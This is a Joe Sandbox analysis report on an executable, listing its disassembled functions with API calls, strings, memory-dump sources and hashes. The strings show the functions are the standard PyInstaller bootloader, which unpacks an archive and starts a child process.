Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction ID: 0e704136c876b31943627566a929b6441944d5297eaf375f677e62f58fa6e172
Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction Fuzzy Hash: 0A516136A196C286E710FF22D8905E9E761FB88794FE05137EA4E83696DF3CE441C760

Function 00007FF78F4888D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF78F488901
FindClose.KERNELBASE ref: 00007FF78F488910

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
Instruction ID: 9a065ccaf5b4cfa839718893d9ab0c17463afa482be19ae5fd636b24de0e1300
Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
Instruction Fuzzy Hash: 28F08172A2D6C586E7609F64E4587AAB390FB84768FA00336D66D036E4DF3CD008CA10

Function 00007FF78F4A0F38 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 56fc9483a7ee5f7c3b0f0c385ec77c25c48e109e1d7b119d188e83d6dac66eb5
Instruction ID: 35b28da56da3444ae9eb18f2d2db545570813930a72e84381788a2c5d0739229
Opcode Fuzzy Hash: 56fc9483a7ee5f7c3b0f0c385ec77c25c48e109e1d7b119d188e83d6dac66eb5
Instruction Fuzzy Hash: E0028C31B0E6D241FA51BB2694006F9A694BF81BA0FE44637DD6E477E2EE7CA441C730

Function 00007FF78F481710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF78F481866
Failed to create symbolic link %s!, xrefs: 00007FF78F481753
fwrite, xrefs: 00007FF78F4818EC
fread, xrefs: 00007FF78F4818FC
malloc, xrefs: 00007FF78F48186D
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF78F4818E5
fopen, xrefs: 00007FF78F481797
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF78F481726
Failed to extract %s: failed to open target file!, xrefs: 00007FF78F481790
fseek, xrefs: 00007FF78F48180D
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF78F4818F5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF78F481806
Failed to extract %s: failed to open archive file!, xrefs: 00007FF78F4817D9

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: 9700799d37cb7dd7bdb1138c0e4ea7450ce332dd9a9464b6d3ee4ba8ff5c532e
Instruction ID: 5dbd01364751bfba7721856c07c47c832e6aae4e106f82d77bad1f08de16dcdc
Opcode Fuzzy Hash: 9700799d37cb7dd7bdb1138c0e4ea7450ce332dd9a9464b6d3ee4ba8ff5c532e
Instruction Fuzzy Hash: BA519271B296C281EA10BB16E8505F9E390BF85794FE44537DE0D476A6DE3CE248C720

Function 00007FF78F488950 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0000000100000001,00007FF78F48414C,00007FF78F487911,?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488990
OpenProcessToken.ADVAPI32(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F4889A1
GetTokenInformation.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F4889C3
GetLastError.KERNEL32(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F4889CD
GetTokenInformation.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A0A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF78F488A1C
CloseHandle.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A34
LocalFree.KERNEL32(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A66
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF78F488A8D
CreateDirectoryW.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A9E

Strings

S-1-3-4, xrefs: 00007FF78F488A3F
D:(A;;FA;;;%s), xrefs: 00007FF78F488A49

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 4998090-2855260032
Opcode ID: 9d301874694f13eee612efc427f36135b77fc192910b60788b949b6aa4b4f411
Instruction ID: e01b86df3a48b9c5c885f7dc84e8e02e1224c1ef3ca8865c355ed4bf08a5f24d
Opcode Fuzzy Hash: 9d301874694f13eee612efc427f36135b77fc192910b60788b949b6aa4b4f411
Instruction Fuzzy Hash: 6241743162DAC682EB50AF51E4446EAB360FF84794FA41232EA5E47AE5DF3CE448C710

Function 00007FF78F481AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78F4882B0: _fread_nolock.LIBCMT ref: 00007FF78F48835A

_fread_nolock.LIBCMT ref: 00007FF78F481B54

Part of subcall function 00007FF78F482890: MessageBoxW.USER32 ref: 00007FF78F48299B

Strings

fseek, xrefs: 00007FF78F481B33
fread, xrefs: 00007FF78F481B66, 00007FF78F481C10
Could not allocate buffer for TOC!, xrefs: 00007FF78F481BD6
malloc, xrefs: 00007FF78F481BDD
MEI, xrefs: 00007FF78F481AE2
Could not read full TOC!, xrefs: 00007FF78F481C09
Failed to seek to cookie position!, xrefs: 00007FF78F481B2C
Error on file., xrefs: 00007FF78F481C36
Failed to read cookie!, xrefs: 00007FF78F481B5F

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: 48a3cce56fb1c2fc23d90f4305464d624e8c6f88618c1eec2050cdc37cf09a3d
Instruction ID: d10a846250f5f4739dd79e6f04045314cd1016e5ed22fe73f8094d2179e42768
Opcode Fuzzy Hash: 48a3cce56fb1c2fc23d90f4305464d624e8c6f88618c1eec2050cdc37cf09a3d
Instruction Fuzzy Hash: E9518D71B2968286EB14EF29D4401F8B3A0FF88B84BB18537DA0D477A9DE7CE444C764

Function 00007FF78F488080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF78F483D52), ref: 00007FF78F4880CF
GetStartupInfoW.KERNEL32 ref: 00007FF78F4880EE

Part of subcall function 00007FF78F49AA14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49AA28

Part of subcall function 00007FF78F498630: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F498697

GetCommandLineW.KERNEL32 ref: 00007FF78F48818E
CreateProcessW.KERNELBASE ref: 00007FF78F4881D0
WaitForSingleObject.KERNEL32 ref: 00007FF78F4881E4
GetExitCodeProcess.KERNELBASE ref: 00007FF78F4881F4

Strings

Error creating child process!, xrefs: 00007FF78F488200
CreateProcessW, xrefs: 00007FF78F488207

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction ID: d2ace39a08ae69aa6dd0f9fbb597094c0ad6c977b2b6d6f751aa53cfb4c88e92
Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction Fuzzy Hash: EF412131A19BC182DA20AB65F4556EAE3A0FB94364FA00336E6AD477E5DF7CD044CB10

Function 00007FF78F481000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78F483EC0: GetModuleFileNameW.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F483EF1

SetDllDirectoryW.KERNEL32 ref: 00007FF78F483BE9

Part of subcall function 00007FF78F487B60: GetEnvironmentVariableW.KERNEL32(00007FF78F483A1F), ref: 00007FF78F487B9A
Part of subcall function 00007FF78F487B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78F487BB7

Strings

MEI, xrefs: 00007FF78F483B1B
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF78F483AC6
_MEIPASS2, xrefs: 00007FF78F483A0B, 00007FF78F483A74, 00007FF78F483D22, 00007FF78F483D2E
Failed to convert DLL search path!, xrefs: 00007FF78F483BD1
_PYI_ONEDIR_MODE, xrefs: 00007FF78F483A34, 00007FF78F483A5F
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF78F483B60

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 961709e27c457eb7e7d62568ba5cf74f7b3efaffa6cfd352c1cb815f9f4d264f
Instruction ID: d352444ba0dd4b211f9a82b26bbfc4690f34c2fb884f8e2c8ad8571a7cb4c849
Opcode Fuzzy Hash: 961709e27c457eb7e7d62568ba5cf74f7b3efaffa6cfd352c1cb815f9f4d264f
Instruction Fuzzy Hash: 2DB16D31B3D6C641EA65BB21D5512FDA290BF88B84FE40133EA5E4769AEF2CE505C720

Function 00007FF78F481050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF78F4810B4
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF78F481249
1.2.13, xrefs: 00007FF78F48107E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF78F4810F1
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF78F48111F
malloc, xrefs: 00007FF78F4810F8, 00007FF78F481126

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-1655038675
Opcode ID: 88534f2458b0e3989dbead5018ec6a961dab2d1cdbb689051e36372a7615677e
Instruction ID: f1f60c84c67c351e3aefeeff0956e19b46b073848617bcb823b92714decf550e
Opcode Fuzzy Hash: 88534f2458b0e3989dbead5018ec6a961dab2d1cdbb689051e36372a7615677e
Instruction Fuzzy Hash: 9251C232B296C285EA60BB55E4403FAA690FF84794FA44133ED4E87795EF3CE545C720

Function 00007FF78F49F1D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF78F49F56A,?,?,-00000018,00007FF78F49B317,?,?,?,00007FF78F49B20E,?,?,?,00007FF78F496452), ref: 00007FF78F49F34C
GetProcAddress.KERNEL32(?,?,?,00007FF78F49F56A,?,?,-00000018,00007FF78F49B317,?,?,?,00007FF78F49B20E,?,?,?,00007FF78F496452), ref: 00007FF78F49F358

Strings

api-ms-, xrefs: 00007FF78F49F296
ext-ms-, xrefs: 00007FF78F49F2A9

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction ID: d1943fdb40502702a4653987b9bdeef96e3c3b76c06ef2bf8e488122e4aff2e2
Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction Fuzzy Hash: E141D631B1968241FA26EB569800AF5A391FF45BA0FE84536DD0D5B7A4DE3DE449C320

Function 00007FF78F49C01C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49C449

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
Instruction ID: 3da9bfa78828ceaf90a384e899513b09906d731e327902bbf2c50f5982afd9a2
Opcode Fuzzy Hash: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
Instruction Fuzzy Hash: D2C1B032B086C791E660AB559440BFDAAA4FB84B90FF50137DA4D873A2CE7CE445C760

Function 00007FF78F49D520 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF78F49D50B), ref: 00007FF78F49D63C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF78F49D50B), ref: 00007FF78F49D6C7

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction ID: 75de7c34e32bbf5a5521a4f835f46dc0f232c54d156f58927087b202a6c464dd
Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction Fuzzy Hash: C791D532F1869185F750AF699440AFDABB0BB44B98FA4413BDE4E577A6CF39D441C320

Function 00007FF78F49FCEC Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF78F49FDDC
_get_daylight.LIBCMT ref: 00007FF78F49FDED
_get_daylight.LIBCMT ref: 00007FF78F49FDFE
_isindst.LIBCMT ref: 00007FF78F49FEC9

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction ID: cee84180aa9e273bd040168f6b263881e69fc4e0c3854a971e1ffa11514a79b3
Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction Fuzzy Hash: 3551E672F041924AFB14EF649945AFCB7A1FB40368FA04136ED1E53AE5DB38A442C710

Function 00007FF78F495854 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF78F495887
GetFileInformationByHandle.KERNELBASE ref: 00007FF78F4958E9
GetLastError.KERNEL32 ref: 00007FF78F49597A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF78F49578C), ref: 00007FF78F4959C6

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction ID: 6f58b711056bdd2d3c29f62a6eae470ef88e6c2867bc027bbf8000c992d3bda8
Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction Fuzzy Hash: B8516932B086818AFB10EB61D4507FDA7E1BB48B68FB08536DE4D476A9DF38D485C720

Function 00007FF78F48C07C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF78F48C08B

Part of subcall function 00007FF78F48C24C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF78F48C26E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF78F48C0A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF78F48C10E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF78F48C161

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
Instruction ID: 4a3eae527bce270e995a97debf5dd62933bb73a3af191b72cffba0786512ca5a
Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
Instruction Fuzzy Hash: 33312A31E292C341FA14BB6594917F9A791BF41784FE45037EA4E872E7CE2CA445C631

Function 00007FF78F495700 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49572D
CreateFileW.KERNELBASE ref: 00007FF78F49576C
CloseHandle.KERNEL32 ref: 00007FF78F4957A1

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
